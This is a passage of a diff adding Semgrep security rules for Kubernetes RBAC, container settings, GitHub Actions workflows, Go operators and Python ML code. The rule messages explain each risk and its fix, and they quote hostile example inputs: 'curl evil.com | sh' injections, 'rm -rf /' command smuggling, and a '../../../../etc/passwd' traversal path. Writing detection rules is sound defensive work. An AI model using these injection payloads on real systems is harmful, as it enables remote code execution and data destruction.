"security" + + - id: k8s-rbac-wildcard-verbs + languages: [yaml] + severity: ERROR + message: | + RBAC rule allows wildcard verbs ["*"] - enables privilege escalation (CWE-269). + + Attack Vector: Grants all permissions (get, list, create, update, patch, delete, deletecollection). + A compromised pod can delete critical resources or modify RBAC rules to escalate privileges. 
+ + Remediation: Use specific verbs based on least privilege: + verbs: ["get", "list", "watch"] # Read-only + verbs: ["create", "update"] # Write permissions + + Never allow: ["escalate", "impersonate", "bind"] - these enable direct privilege escalation. + patterns: + - pattern: | + verbs: + - "*" + - pattern-inside: | + kind: ClusterRole + ... + metadata: + cwe: "CWE-269" + owasp: "A01:2021" + category: "security" + + - id: k8s-rbac-dangerous-verbs + languages: [yaml] + severity: ERROR + message: | + RBAC rule contains dangerous verbs that enable privilege escalation. + + Dangerous verbs: + - "escalate": Allows modifying RBAC rules to grant higher privileges + - "impersonate": Allows acting as other users/service accounts + - "bind": Allows binding ClusterRoles without owning all permissions + + Remediation: Remove dangerous verbs. Use specific permissions instead. + pattern-either: + - pattern: | + verbs: + - ... + - "escalate" + - ... + - pattern: | + verbs: + - ... + - "impersonate" + - ... + - pattern: | + verbs: + - ... + - "bind" + - ... + metadata: + cwe: "CWE-269" + category: "security" + + - id: k8s-rbac-cluster-admin-binding + languages: [yaml] + severity: WARNING + message: | + Binding to cluster-admin detected (CWE-269). + + The cluster-admin ClusterRole grants unrestricted access to ALL resources in ALL namespaces. + This is almost never needed for application workloads. + + Remediation: Create a custom ClusterRole with least-privilege permissions: + kind: ClusterRole + rules: + - apiGroups: [""] + resources: ["pods"] + verbs: ["get", "list", "watch"] + patterns: + - pattern: | + roleRef: + name: cluster-admin + ... + metadata: + cwe: "CWE-269" + category: "security" + + - id: k8s-rbac-broad-subject + languages: [yaml] + severity: ERROR + message: | + RBAC binding to system:authenticated or system:unauthenticated (CWE-269). + + These groups include ALL authenticated/unauthenticated users in the cluster. 
+ Binding to these grants access to every user, including service accounts + from all namespaces. + + Remediation: Bind to specific ServiceAccounts, Users, or Groups instead. + patterns: + - pattern-either: + - pattern: | + subjects: + - kind: Group + name: system:authenticated + - pattern: | + subjects: + - kind: Group + name: system:unauthenticated + metadata: + cwe: "CWE-269" + category: "security" + + - id: k8s-rbac-create-persistentvolumes + languages: [yaml] + severity: WARNING + message: | + Permission to create PersistentVolumes can enable host-level privilege escalation (CWE-269). + + A ClusterRole with create access to PersistentVolumes can provision hostPath PVs, + allowing pods to mount arbitrary host directories. + + Remediation: Restrict PV creation to cluster administrators only. + Use PersistentVolumeClaims for application workloads. + patterns: + - pattern: | + kind: ClusterRole + ... + rules: + - ... + resources: + - persistentvolumes + ... + verbs: + - create + metadata: + cwe: "CWE-269" + category: "security" + + - id: k8s-rbac-aggregated-clusterrole + languages: [yaml] + severity: INFO + message: | + Aggregated ClusterRole detected. + + Review aggregation selectors carefully to prevent unintended permission grants. + Aggregated roles can accumulate unexpected permissions if selectors are too broad. + patterns: + - pattern: | + aggregationRule: + ... + - pattern-inside: | + kind: ClusterRole + ... + metadata: + category: "security" + note: "Not necessarily dangerous, but aggregated roles can accumulate unexpected permissions if selectors are too broad" + + - id: k8s-rbac-secrets-cluster-access + languages: [yaml] + severity: WARNING + message: | + ClusterRole grants secret access (get/list/watch) across all namespaces (CWE-200). + + Secrets may contain credentials, TLS certificates, and other sensitive data. + Cluster-wide access allows reading secrets from all namespaces. 
+ + Remediation: Use namespace-scoped Role instead of ClusterRole for secrets access + unless cross-namespace access is explicitly required. + patterns: + - pattern: | + resources: + - secrets + - pattern-either: + - pattern-inside: | + kind: ClusterRole + ... + rules: + - verbs: + - get + - pattern-inside: | + kind: ClusterRole + ... + rules: + - verbs: + - list + - pattern-inside: | + kind: ClusterRole + ... + rules: + - verbs: + - watch + metadata: + cwe: "CWE-200" + category: "security" + + - id: k8s-rolebinding-references-clusterrole + languages: [yaml] + severity: WARNING + message: | + RoleBinding references a ClusterRole (CWE-269). + + While this is a valid Kubernetes pattern for namespace-scoping cluster-level + permissions, it deserves review to ensure the referenced ClusterRole does not + grant more permissions than intended for this namespace. + + Remediation: Verify the referenced ClusterRole has appropriate permissions. + Consider creating a namespace-scoped Role if only specific permissions are needed. + patterns: + - pattern: | + kind: RoleBinding + ... + roleRef: + kind: ClusterRole + ... + metadata: + cwe: "CWE-269" + category: "security" + + # ========================================================================== + # SECTION 3: KUBERNETES CONTAINER SECURITY + # ========================================================================== + + - id: k8s-privileged-container + languages: [yaml] + severity: ERROR + message: | + Container runs in privileged mode - allows host access (CWE-250). + + Attack Vector: Privileged containers can access host devices, mount host filesystems, + and bypass all Linux security modules (SELinux, AppArmor). This enables container escape. + + Remediation: Remove "privileged: true". Use specific capabilities if needed: + securityContext: + capabilities: + add: ["NET_ADMIN"] # Only grant specific capabilities + pattern: | + securityContext: + ... + privileged: true + ... 
+ metadata: + cwe: "CWE-250" + owasp: "A01:2021" + category: "security" + + - id: k8s-missing-security-context-runAsNonRoot + languages: [yaml] + severity: WARNING + message: | + Pod/Container missing securityContext.runAsNonRoot. + + Best Practice: Containers should not run as root (UID 0) to limit impact of container escape. + + Remediation: Add to pod or container spec: + securityContext: + runAsNonRoot: true + runAsUser: 1000 # Non-root UID + patterns: + - pattern-inside: | + kind: $KIND + ... + - metavariable-regex: + metavariable: $KIND + regex: ^(Deployment|StatefulSet|DaemonSet|Pod)$ + - pattern-not: | + securityContext: + ... + runAsNonRoot: true + ... + metadata: + category: "security" + severity: "warning" + + - id: k8s-hostpath-mount + languages: [yaml] + severity: ERROR + message: | + Container mounts hostPath volume - allows host filesystem access (CWE-653). + + Attack Vector: hostPath mounts bypass container isolation. A compromised pod can + read/write host files including /etc/shadow, SSH keys, or Kubernetes secrets. + + Remediation: Use PersistentVolumeClaims, ConfigMaps, or Secrets instead. + If hostPath is absolutely necessary (e.g., DaemonSet for node monitoring), + mount as readOnly and restrict to specific paths. + pattern: | + volumes: + - name: $NAME + hostPath: + path: $PATH + metadata: + cwe: "CWE-653" + category: "security" + + - id: k8s-secret-in-configmap + languages: [yaml] + severity: ERROR + message: | + Secret value stored in ConfigMap instead of Secret. + + Security Risk: ConfigMaps are not designed for sensitive data: + - Not encrypted at rest by default + - Visible in kubectl get configmap -o yaml + - No audit logging for access + - May be logged by monitoring tools + + Remediation: Use Secret instead: + apiVersion: v1 + kind: Secret + metadata: + name: my-secret + type: Opaque + data: + password: + + Or use external secret management: SealedSecrets, external-secrets, Vault. 
+ patterns: + - pattern-either: + - pattern: | + kind: ConfigMap + ... + data: + password: $VALUE + - pattern: | + kind: ConfigMap + ... + data: + token: $VALUE + - pattern: | + kind: ConfigMap + ... + data: + apiKey: $VALUE + metadata: + cwe: "CWE-522" + category: "security" + + - id: yaml-hardcoded-secret + languages: [yaml] + severity: WARNING + message: | + Potential hardcoded secret in YAML file. + + Keys matching: password, passwd, secret, token, apiKey, privateKey + + Remediation: Move secrets to environment variables or secret management. + pattern-regex: |- + (?i)^[[:space:]]*(password|passwd|secret|token|api[_-]?key|private[_-]?key):[[:space:]]*["']?[^"'\s]{8,} + metadata: + cwe: "CWE-798" + category: "security" + + - id: k8s-pod-automount-token + languages: [yaml] + severity: WARNING + message: | + Workload explicitly enables automountServiceAccountToken (CWE-200). + + When enabled, the ServiceAccount token is mounted into the pod at + /var/run/secrets/kubernetes.io/serviceaccount/token. If the pod is + compromised, the attacker can use this token to access the Kubernetes API. + + Remediation: Set automountServiceAccountToken: false if the pod doesn't + need Kubernetes API access (most application pods don't). + pattern-either: + # Match Pod directly + - patterns: + - pattern: | + automountServiceAccountToken: true + - pattern-inside: | + kind: Pod + ... + # Match Deployment, StatefulSet, DaemonSet, ReplicaSet pod template + - patterns: + - pattern: | + automountServiceAccountToken: true + - pattern-inside: | + kind: $KIND + ... + spec: + ... + template: + ... + - metavariable-regex: + metavariable: $KIND + regex: (Deployment|StatefulSet|DaemonSet|ReplicaSet) + # Match Job pod template + - patterns: + - pattern: | + automountServiceAccountToken: true + - pattern-inside: | + kind: Job + ... + spec: + ... + template: + ... 
+ # Match CronJob pod template (nested under jobTemplate) + - patterns: + - pattern: | + automountServiceAccountToken: true + - pattern-inside: | + kind: CronJob + ... + spec: + ... + jobTemplate: + ... + spec: + ... + template: + ... + metadata: + cwe: "CWE-200" + category: "security" + + - id: k8s-pod-default-serviceaccount + languages: [yaml] + severity: WARNING + message: | + Workload uses default ServiceAccount (CWE-250). + + The default ServiceAccount may have more permissions than needed. + Each workload should use a dedicated ServiceAccount with minimal RBAC + permissions following the principle of least privilege. + + Remediation: Create a dedicated ServiceAccount: + apiVersion: v1 + kind: ServiceAccount + metadata: + name: my-app-sa + pattern-either: + # Match Pod directly — explicit default + - pattern: | + kind: Pod + ... + spec: + ... + serviceAccountName: default + # Match Pod directly — no SA specified + - patterns: + - pattern: | + kind: Pod + ... + spec: + ... + - pattern-not: | + serviceAccountName: $SA + # Match controllers — explicit default + - patterns: + - pattern: | + spec: + ... + template: + ... + spec: + ... + serviceAccountName: default + - pattern-inside: | + kind: $KIND + ... + - metavariable-regex: + metavariable: $KIND + regex: (Deployment|StatefulSet|DaemonSet|ReplicaSet|Job) + # Match controllers — no SA specified (implicit default) + - patterns: + - pattern: | + spec: + ... + template: + ... + spec: + ... + - pattern-not: | + spec: + ... + template: + ... + spec: + ... + serviceAccountName: $SA + - pattern-inside: | + kind: $KIND + ... + - metavariable-regex: + metavariable: $KIND + regex: (Deployment|StatefulSet|DaemonSet|ReplicaSet|Job) + # Match CronJob — explicit default + - patterns: + - pattern: | + spec: + ... + jobTemplate: + ... + spec: + ... + template: + ... + spec: + ... + serviceAccountName: default + - pattern-inside: | + kind: CronJob + ... 
+ # Match CronJob — no SA specified (implicit default) + - patterns: + - pattern: | + spec: + ... + jobTemplate: + ... + spec: + ... + template: + ... + spec: + ... + - pattern-not: | + spec: + ... + jobTemplate: + ... + spec: + ... + template: + ... + spec: + ... + serviceAccountName: $SA + - pattern-inside: | + kind: CronJob + ... + metadata: + cwe: "CWE-250" + category: "security" + + # ========================================================================== + # SECTION 4: GITHUB ACTIONS SECURITY — Workflow files + # ========================================================================== + + - id: github-actions-hardcoded-secret + languages: [yaml] + severity: ERROR + message: | + Hardcoded secret in GitHub Actions workflow. + + Security Risk: Secrets in workflows are visible in git history and to all collaborators. + + Remediation: Use GitHub Secrets: + env: + API_KEY: ${{ secrets.API_KEY }} + + Add secret at: Repository Settings > Secrets and variables > Actions > New repository secret + patterns: + - pattern-either: + - pattern: | + env: + $KEY: $VALUE + - pattern: | + with: + $KEY: $VALUE + - metavariable-regex: + metavariable: $KEY + regex: (?i)(password|passwd|token|api[_-]?key|secret) + - metavariable-pattern: + metavariable: $VALUE + patterns: + - pattern-not: ${{ secrets.$SECRET }} + - pattern-not: ${{ env.$ENV }} + paths: + include: + - "**/.github/workflows/*.yml" + - "**/.github/workflows/*.yaml" + metadata: + cwe: "CWE-798" + category: "security" + + - id: github-actions-script-injection + languages: [generic] + severity: ERROR + message: | + GitHub Actions expression injection in workflow run block (CWE-78). 
+ + Attack Vector: Attacker-controlled values from PR titles, issue bodies, branch names, + or commit messages are interpolated directly into shell commands: + run: echo "${{ github.event.pull_request.title }}" + # PR title: "; curl evil.com | sh" + + Dangerous fields (attacker-controlled text): + - github.event.issue.title / body + - github.event.pull_request.title / body / head.ref + - github.event.comment.body + - github.event.review.body + - github.event.discussion.title / body + - github.event.head_commit.message + - github.head_ref + + Safe fields (constrained values - do not flag): + - github.event.number, github.event.action, github.sha, github.actor + + Remediation: Move to environment variable (shell handles escaping): + - name: Process PR + run: echo "$TITLE" + env: + TITLE: ${{ github.event.pull_request.title }} + patterns: + - pattern-regex: 'run:\s*(?:[|>][-+]?\n(?:[ \t]+[^\n]*\n)*|[^\n]*)\$\{\{\s*github\.(head_ref|event\.(issue|pull_request|discussion|review|review_comment|comment)\.(title|body|head\.ref|head\.label)|event\.head_commit\.message|event\.commits\[\d+\]\.message)\s*\}\}' + paths: + include: + - "**/.github/workflows/*.yml" + - "**/.github/workflows/*.yaml" + metadata: + cwe: "CWE-78" + owasp: "A03:2021 - Injection" + category: "security" + references: + - "https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections" + + - id: github-actions-pull-request-target-checkout + languages: [generic] + severity: WARNING + message: | + Unsafe checkout in pull_request_target workflow (CWE-829). + + Attack Vector: pull_request_target runs with WRITE token and access to secrets. + If the workflow checks out the PR head code, a malicious PR can: + 1. Modify build scripts to steal secrets + 2. Push malicious code with write permissions + 3. 
Execute arbitrary commands with elevated privileges + + Unsafe patterns (flag these): + ref: ${{ github.event.pull_request.head.sha }} + ref: ${{ github.event.pull_request.head.ref }} + + Safe patterns (do not flag): + - No ref specified (defaults to base branch) + - ref: refs/pull/${{ github.event.number }}/merge + - ref: ${{ github.event.pull_request.base.sha }} + + Remediation: + - Use artifact passing between workflows instead of direct checkout + - If checkout is needed, use merge commit: refs/pull/${{ github.event.number }}/merge + - Add persist-credentials: false to limit token scope + patterns: + - pattern-regex: 'pull_request_target[\s\S]*?uses:\s*actions/checkout@[^\n]*\n(\s+[\w-]+:.*\n)*\s+ref:\s*\$\{\{[^\}]*pull_request\.head\.(sha|ref)\s*\}\}' + paths: + include: + - "**/.github/workflows/*.yml" + - "**/.github/workflows/*.yaml" + metadata: + cwe: "CWE-829" + category: "security" + references: + - "https://securitylab.github.com/research/github-actions-preventing-pwn-requests/" + + # ========================================================================== + # SECTION 5: GO SECURITY — Kubernetes Controllers & Operators + # ========================================================================== + + - id: go-exec-command-shell-injection + languages: [go] + severity: ERROR + message: | + Command injection via shell execution (CWE-78). + + Attack Vector: User-controlled input from CR spec can be injected into shell commands: + exec.Command("/bin/sh", "-c", "echo " + cr.Spec.UserInput) + Input like: "; rm -rf /" would execute arbitrary commands. + + Remediation: Use exec.Command with separate arguments (no shell): + cmd := exec.Command("echo", cr.Spec.UserInput) # Safe - no shell interpretation + + Or validate input with allowlist regex before using in shell commands. + patterns: + - pattern-either: + - pattern: exec.Command("/bin/sh", "-c", ...) + - pattern: exec.Command("sh", "-c", ...) + - pattern: exec.Command("/bin/bash", "-c", ...) 
+ - pattern: exec.Command("bash", "-c", ...) + metadata: + cwe: "CWE-78" + owasp: "A03:2021" + category: "security" + + - id: go-tls-insecure-skip-verify + languages: [go] + severity: ERROR + message: | + TLS certificate verification disabled (CWE-295). + + Attack Vector: Enables Man-in-the-Middle attacks. Attacker can intercept traffic + to external APIs and steal credentials or manipulate responses. + + Remediation: Remove "InsecureSkipVerify: true" and use proper certificate validation. + For custom CAs, add to system trust store or use custom RootCAs. + pattern: | + &tls.Config{ + ..., + InsecureSkipVerify: true, + ... + } + metadata: + cwe: "CWE-295" + owasp: "A02:2021" + category: "security" + + - id: go-kubernetes-client-no-owner-reference + languages: [go] + severity: WARNING + message: | + Creating Kubernetes resource without OwnerReference. + + Best Practice: Child resources should have OwnerReferences to their parent CR. + Without this, resources become orphaned when the CR is deleted (garbage collection fails). + + Remediation: Use controller-runtime helper: + import "sigs.k8s.io/controller-runtime/pkg/controller/controllerutil" + + if err := controllerutil.SetControllerReference(parentCR, childResource, r.Scheme); err != nil { + return err + } + if err := r.Create(ctx, childResource); err != nil { + return err + } + patterns: + - pattern: $CLIENT.Create($CTX, $RESOURCE) + - pattern-not-inside: | + controllerutil.SetControllerReference(...) + ... + $CLIENT.Create($CTX, $RESOURCE) + metadata: + category: "best-practice" + + - id: go-cr-spec-to-configmap-without-validation + languages: [go] + severity: ERROR + message: | + CR spec field used in ConfigMap without validation - enables injection attacks. 
+ + Attack Vector: User can create CR with malicious data that gets injected into pods: + apiVersion: v1 + kind: MyCR + spec: + command: "curl evil.com | sh" # Attacker-controlled + + If operator creates ConfigMap/Secret with this data and pod uses it in command, + attacker achieves remote code execution. + + Remediation: Validate CR spec fields before storing in ConfigMap: + - Check length limits (prevent resource exhaustion) + - Validate character patterns (no shell metacharacters: $, `, |, ;, &) + - Use allowlist regex for expected formats + - Sanitize or reject invalid input + patterns: + - pattern-either: + - pattern: | + Data: map[string]string{ + ..., + $KEY: $CR.Spec.$FIELD, + ..., + } + - pattern: | + Data[$KEY] = $CR.Spec.$FIELD + - pattern-inside: | + &corev1.ConfigMap{ + ... + } + - pattern-not-inside: | + if $VALIDATION { + ... + } + metadata: + cwe: "CWE-20" + category: "security" + + - id: go-sql-injection + languages: [go] + severity: ERROR + message: | + SQL injection vulnerability (CWE-89). + + Attack Vector: User input concatenated into SQL query: + query := fmt.Sprintf("SELECT * FROM users WHERE id = %s", userID) + Input like "1 OR 1=1" would bypass authentication or leak data. + + Remediation: Use parameterized queries: + db.Query("SELECT * FROM users WHERE id = ?", userID) + patterns: + - pattern-either: + - pattern: $DB.Query(fmt.Sprintf(..., $INPUT, ...), ...) + - pattern: $DB.Exec(fmt.Sprintf(..., $INPUT, ...), ...) + - pattern: $DB.Query($QUERY + $INPUT, ...) + - pattern: $DB.Exec($QUERY + $INPUT, ...) + metadata: + cwe: "CWE-89" + owasp: "A03:2021" + category: "security" + + - id: go-weak-crypto-md5 + languages: [go] + severity: WARNING + message: | + Weak cryptographic hash MD5 detected (CWE-327). + + MD5 is cryptographically broken (collision attacks). Do not use for security purposes. 
+ + Remediation: Use SHA-256 or SHA-3: + import "crypto/sha256" + hash := sha256.Sum256(data) + patterns: + - pattern-either: + - pattern: md5.New() + - pattern: md5.Sum($DATA) + metadata: + cwe: "CWE-327" + category: "security" + + - id: go-weak-crypto-sha1 + languages: [go] + severity: WARNING + message: | + Weak cryptographic hash SHA1 detected (CWE-327). + + SHA1 is deprecated due to collision attacks. Do not use for security purposes. + + Remediation: Use SHA-256 or SHA-3. + patterns: + - pattern-either: + - pattern: sha1.New() + - pattern: sha1.Sum($DATA) + metadata: + cwe: "CWE-327" + category: "security" + + - id: go-hardcoded-credentials + languages: [go] + severity: ERROR + message: | + Hardcoded credentials detected (CWE-798). + + Security Risk: Credentials in source code are visible in git history and container images. + + Remediation: Use environment variables or Kubernetes Secrets: + password := os.Getenv("DATABASE_PASSWORD") + patterns: + - pattern-either: + - pattern: | + $VAR := $VALUE + - pattern: | + const $VAR = $VALUE + - pattern: | + var $VAR = $VALUE + - metavariable-regex: + metavariable: $VAR + regex: (?i)(password|passwd|secret|token|api[_-]?key|private[_-]?key|credentials?) + - metavariable-regex: + metavariable: $VALUE + regex: '"[^"]{8,}"' + - pattern-not: | + $VAR := os.Getenv("...") + - pattern-not: | + var $VAR = os.Getenv("...") + - pattern-not: | + $VAR, $_ := os.LookupEnv("...") + metadata: + cwe: "CWE-798" + owasp: "A07:2021" + category: "security" + + - id: go-log-sensitive-data + languages: [go] + severity: WARNING + message: | + Logging sensitive data from Kubernetes Secret. + + Security Risk: Secrets logged to stdout appear in: + - Kubernetes pod logs (accessible via kubectl logs) + - Log aggregation systems (Splunk, Elasticsearch) + - Container runtime logs on nodes + + Remediation: Never log Secret.Data fields. 
Log metadata only: + logger.Info("Processing secret", "name", secret.Name, "namespace", secret.Namespace) + patterns: + - pattern-either: + - pattern: $LOG.$METHOD(..., $SECRET.Data, ...) + - pattern: $LOG.$METHOD(..., $SECRET.Data[$KEY], ...) + - metavariable-regex: + metavariable: $METHOD + regex: ^(Info|Error|Debug|Warn|Printf|Println)$ + metadata: + cwe: "CWE-532" + category: "security" + + - id: go-tls-config-no-min-version + languages: [go] + severity: INFO + message: | + TLS config without explicit MinVersion (CWE-326). + + Go 1.18+ defaults to TLS 1.2 minimum, but explicit configuration is recommended + for compliance clarity (FedRAMP, FIPS) and defense in depth. + + Remediation: Set MinVersion explicitly: + &tls.Config{ + MinVersion: tls.VersionTLS12, + } + patterns: + - pattern: | + &tls.Config{ + ... + } + - pattern-not: | + &tls.Config{ + ..., + MinVersion: ..., + ... + } + paths: + exclude: + - "**/vendor/**" + metadata: + cwe: "CWE-326" + category: "security" + + - id: go-http-client-no-timeout + languages: [go] + severity: WARNING + message: | + HTTP client without timeout can hang indefinitely (CWE-400). + + An http.Client without an explicit Timeout will wait forever for a response, + which can exhaust goroutines and file descriptors under load or network issues. + + Remediation: Always set a Timeout: + client := &http.Client{ + Timeout: 30 * time.Second, + } + patterns: + - pattern: | + &http.Client{ + ... + } + - pattern-not: | + &http.Client{ + ..., + Timeout: ..., + ... + } + metadata: + cwe: "CWE-400" + category: "security" + + # ========================================================================== + # SECTION 6: PYTHON SECURITY — ML/Data Science Applications + # ========================================================================== + + - id: python-eval-exec-injection + languages: [python] + severity: ERROR + message: | + Code injection via eval() or exec() (CWE-94). 
+ + Attack Vector: User-controlled input from API requests, notebook cells, or config files + can execute arbitrary Python code: + eval(user_input) # Input: "__import__('os').system('rm -rf /')" + + Remediation: Never use eval/exec with untrusted input. + For safe evaluation of literals, use ast.literal_eval(): + import ast + value = ast.literal_eval(user_input) # Only parses literals (strings, numbers, lists) + patterns: + - pattern-either: + - pattern: eval($INPUT) + - pattern: exec($INPUT) + metadata: + cwe: "CWE-94" + owasp: "A03:2021 - Injection" + category: "security" + + - id: python-sql-injection-format + languages: [python] + severity: ERROR + message: | + SQL injection via f-string or format() (CWE-89). + + Attack Vector: User input in SQL query enables data exfiltration or authentication bypass: + cursor.execute(f"SELECT * FROM users WHERE id = {user_id}") + # Input: "1 OR 1=1" would return all users + + Remediation: Use parameterized queries: + cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,)) # PostgreSQL + cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,)) # SQLite + patterns: + - pattern-either: + - pattern: $CURSOR.execute(f"...") + - pattern: $CURSOR.execute("...".format(...)) + - pattern: $CURSOR.execute($QUERY + $INPUT) + metadata: + cwe: "CWE-89" + owasp: "A03:2021 - Injection" + category: "security" + + - id: python-pickle-unsafe-load + languages: [python] + severity: ERROR + message: | + Unsafe pickle.load() - arbitrary code execution (CWE-502). + + Attack Vector: Pickle can execute arbitrary code during deserialization. + A malicious .pkl file can: + - Execute shell commands (os.system("...")) + - Exfiltrate data to attacker-controlled servers + - Install backdoors in the ML serving environment + + Why ML Models Are Targets: PyTorch, scikit-learn, and XGBoost use pickle by default. + Attacker uploads poisoned model -> triggers remote code execution on inference. + + Remediation: + 1. 
Use safer formats: ONNX, HDF5, SavedModel (TensorFlow), TorchScript + 2. If pickle is required, validate file source and use signature verification + 3. Run model loading in sandboxed environment with restricted permissions + 4. Never load pickle files from untrusted sources (user uploads, HTTP downloads) + + Safe alternatives: + # PyTorch + torch.jit.save(model, "model.pt") # TorchScript (no pickle) + + # TensorFlow + model.save("model", save_format="tf") # SavedModel format + + # scikit-learn + joblib.dump(model, "model.joblib", compress=3) # Still uses pickle + # Better: Convert to ONNX with skl2onnx + + # ONNX (universal) + import onnx + onnx.save(model, "model.onnx") + patterns: + - pattern-either: + - pattern: pickle.load($FILE) + - pattern: pickle.loads($DATA) + - pattern: pickle.Unpickler($FILE) + - pattern: joblib.load($FILE) + metadata: + cwe: "CWE-502" + owasp: "A08:2021 - Software and Data Integrity Failures" + category: "security" + references: + - "https://github.com/onnx/onnx" + - "https://pytorch.org/docs/stable/jit.html" + + - id: python-yaml-unsafe-load + languages: [python] + severity: ERROR + message: | + yaml.load() without safe loader - arbitrary code execution (CWE-502). + + Attack Vector: yaml.load() can instantiate arbitrary Python objects and execute code. + + Remediation: Use yaml.safe_load() instead: + import yaml + data = yaml.safe_load(file) # Safe - only parses basic YAML types + patterns: + - pattern-either: + - pattern: yaml.load($INPUT) + - pattern: yaml.load($INPUT, Loader=yaml.Loader) + - pattern: yaml.load($INPUT, Loader=yaml.FullLoader) + - pattern-not: yaml.load($INPUT, Loader=yaml.SafeLoader) + metadata: + cwe: "CWE-502" + category: "security" + + - id: python-shell-injection-subprocess + languages: [python] + severity: ERROR + message: | + Command injection via subprocess with shell=True (CWE-78). 
+ + Attack Vector: User input in shell command enables arbitrary command execution: + subprocess.run(f"convert {user_file}.png output.jpg", shell=True) + # Input: "file.png; rm -rf /" would delete files + + Remediation: Use shell=False with list arguments: + subprocess.run(["convert", f"{user_file}.png", "output.jpg"], shell=False) + # Safe - no shell interpretation, input is treated as literal argument + patterns: + - pattern-either: + - pattern: subprocess.run(..., shell=True) + - pattern: subprocess.Popen(..., shell=True) + - pattern: subprocess.call(..., shell=True) + - pattern: subprocess.check_output(..., shell=True) + metadata: + cwe: "CWE-78" + owasp: "A03:2021 - Injection" + category: "security" + + - id: python-os-system + languages: [python] + severity: ERROR + message: | + Command injection via os.system() (CWE-78). + + os.system() always uses shell and is vulnerable to injection. + + Remediation: Use subprocess.run() with shell=False: + subprocess.run(["command", "arg1", "arg2"], shell=False) + patterns: + - pattern: os.system($CMD) + - pattern-not: os.system("...") + metadata: + cwe: "CWE-78" + owasp: "A03:2021 - Injection" + category: "security" + + - id: python-path-traversal-open + languages: [python] + severity: ERROR + message: | + Path traversal vulnerability (CWE-22). + + Attack Vector: User-controlled file paths can access restricted files: + open(user_provided_path) + # Input: "../../../../etc/passwd" could leak system files + + Remediation: Validate and sanitize file paths: + import os + safe_path = os.path.normpath(user_provided_path) + if not safe_path.startswith(ALLOWED_DIR): + raise ValueError("Path traversal detected") + open(safe_path) + patterns: + - pattern-either: + - pattern: open($PATH, ...) + - pattern: Path($PATH) + - pattern: pathlib.Path($PATH) + - metavariable-pattern: + metavariable: $PATH + patterns: + - pattern-not: "..." 
# Exclude literal strings + metadata: + cwe: "CWE-22" + owasp: "A01:2021 - Broken Access Control" + category: "security" + + - id: python-hardcoded-password + languages: [python] + severity: ERROR + message: | + Hardcoded password/secret detected (CWE-798). + + Security Risk: Credentials in source code are visible in git history and container images. + + Remediation: Use environment variables: + import os + password = os.getenv("DATABASE_PASSWORD") + if not password: + raise ValueError("DATABASE_PASSWORD not set") + patterns: + - pattern-either: + - pattern: password = $VALUE + - pattern: PASSWORD = $VALUE + - pattern: api_key = $VALUE + - pattern: API_KEY = $VALUE + - pattern: secret = $VALUE + - pattern: SECRET = $VALUE + - pattern: token = $VALUE + - pattern: TOKEN = $VALUE + - metavariable-pattern: + metavariable: $VALUE + patterns: + - pattern-regex: |- + ["'][^"']{8,}["'] + metadata: + cwe: "CWE-798" + owasp: "A07:2021 - Identification and Authentication Failures" + category: "security" + + - id: python-flask-debug-mode-production + languages: [python] + severity: WARNING + message: | + Flask debug mode enabled (potential production issue). + + Security Risk: Debug mode exposes: + - Interactive Python debugger (code execution via web interface) + - Detailed error messages with source code + - Automatic code reloading + + Remediation: Never enable debug mode in production: + app.run(debug=False) # Production + # Or control via environment variable: + app.run(debug=os.getenv("FLASK_DEBUG", "false") == "true") + pattern: app.run(..., debug=True, ...) + metadata: + category: "security" + + - id: python-sql-alchemy-text-injection + languages: [python] + severity: ERROR + message: | + SQL injection via SQLAlchemy text() without parameterization (CWE-89). 
+ + Attack Vector: String concatenation in text() bypasses ORM protections: + db.execute(text(f"SELECT * FROM users WHERE id = {user_id}")) + + Remediation: Use parameterized queries: + db.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id}) + patterns: + - pattern-either: + - pattern: text(f"...") + - pattern: text("..." + ...) + - pattern: text("...".format(...)) + metadata: + cwe: "CWE-89" + category: "security" + + - id: python-pandas-eval-query + languages: [python] + severity: WARNING + message: | + pandas.eval() or DataFrame.query() with user input - potential code injection. + + Attack Vector: User-controlled expressions can execute arbitrary code: + df.query(user_input) # Input: "__import__('os').system('...')" + + Remediation: Validate input against allowlist of safe column names and operators: + SAFE_COLUMNS = {"price", "quantity", "total"} + if not all(col in SAFE_COLUMNS for col in extract_columns(user_query)): + raise ValueError("Invalid column") + df.query(user_query) + patterns: + - pattern-either: + - pattern: pd.eval($EXPR) + - pattern: pandas.eval($EXPR) + - pattern: $DF.eval($EXPR) + - pattern: $DF.query($EXPR) + metadata: + cwe: "CWE-94" + category: "security" + + - id: python-huggingface-trust-remote-code + languages: [python] + severity: WARNING + message: | + trust_remote_code=True enables arbitrary code execution from model repos (CWE-829). + + Attack Vector: HuggingFace models with trust_remote_code=True download and execute + arbitrary Python code from the model repository. A malicious model can: + - Execute shell commands on the serving infrastructure + - Exfiltrate data and credentials + - Install backdoors or cryptominers + + RHOAI Impact: Affects Caikit, vLLM, and any service loading HuggingFace models. 
+ + Remediation: + - Use trust_remote_code=False (default since transformers 4.0+) + - Pin model commits to verified revisions + - Use model scanning tools (ModelScan, Safetensors) + - If trust_remote_code=True is required, add justification comment: + # nosemgrep: python-huggingface-trust-remote-code - Model X requires custom code + patterns: + - pattern-either: + - pattern: AutoModel.from_pretrained(..., trust_remote_code=True, ...) + - pattern: AutoTokenizer.from_pretrained(..., trust_remote_code=True, ...) + - pattern: AutoModelForCausalLM.from_pretrained(..., trust_remote_code=True, ...) + - pattern: AutoModelForSeq2SeqLM.from_pretrained(..., trust_remote_code=True, ...) + - pattern: pipeline(..., trust_remote_code=True, ...) + metadata: + cwe: "CWE-829" + owasp: "A08:2021 - Software and Data Integrity Failures" + category: "security" + references: + - "https://huggingface.co/docs/transformers/main/en/autoclass_tutorial" + + - id: python-torch-load-unsafe + languages: [python] + severity: WARNING + message: | + torch.load() without weights_only=True - arbitrary code execution via pickle (CWE-502). + + Attack Vector: PyTorch uses pickle internally. A malicious .pt/.pth file can execute + arbitrary code during deserialization: + model = torch.load("malicious_model.pt") # Executes hidden payload + + RHOAI Impact: KServe, ModelMesh, and inference services loading user-uploaded models. + + Remediation: Use weights_only=True (PyTorch 2.0+): + model = torch.load("model.pt", weights_only=True) + + For training checkpoints that need full state: + - Validate source is trusted (internal model registry, not user uploads) + - Use Safetensors format instead: safetensors.torch.load_file("model.safetensors") + - Add justification: # nosemgrep: python-torch-load-unsafe - internal trusted source + patterns: + - pattern: torch.load(...) + - pattern-not: torch.load(..., 